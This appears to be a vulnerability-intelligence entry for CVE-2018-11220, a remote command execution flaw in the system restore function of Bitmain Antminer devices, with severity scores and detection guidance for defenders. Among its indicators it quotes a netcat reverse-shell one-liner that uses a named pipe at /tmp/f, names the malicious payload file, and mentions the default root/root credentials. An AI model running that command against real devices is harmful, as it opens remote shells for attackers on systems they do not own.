CVE-2018-11220
published 2018-05-31

CVE-2018-11220: Bitmain Antminer D3, L3+, and S9 devices allow Remote Command Execution via the system restore function.

Priority: P2 (67, high)
CVSS 3.0: 8.8 (AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H)
Exploit: public exploit available
EPSS: 16.41% (96.6th percentile)

Detection & IOCs (extracted from sources)

filename: restoreConfig.sh
filename: Exploit.tar
command: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc your_ip your_port >/tmp/f
path: /tmp/f
  • Monitor HTTP multipart file upload requests to the system restore/upgrade endpoint containing a TAR archive with a file named 'restoreConfig.sh' — this is the malicious payload delivery mechanism for CVE-2018-11220.
  • Alert on the presence of a named pipe at /tmp/f combined with an outbound netcat (nc) connection, which is the reverse shell pattern used in the exploit payload.
  • Exploitation requires valid credentials; default credentials root/root on Bitmain Antminer devices should be treated as an active risk indicator — successful login followed by a restore/upgrade action is a high-fidelity attack sequence.
  • Inspect uploaded TAR archives to the Antminer administration portal for the presence of shell scripts, particularly 'restoreConfig.sh', which is executed during the system restore process.
  • Exploitation requires valid credentials to the Antminer administration portal, meaning the attacker must already have (or have guessed/brute-forced) login access before the RCE is reachable.
  • The vulnerability affects multiple Antminer device families (D3, L3+, S9, and potentially others), so detection and patching scope should not be limited to a single model.

CVSS provenance

NVD, CVSS v3.0: 8.8 HIGH (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
NVD, CVSS v2.0: 9.0 CRITICAL (AV:N/AC:L/Au:S/C:C/I:C/A:C)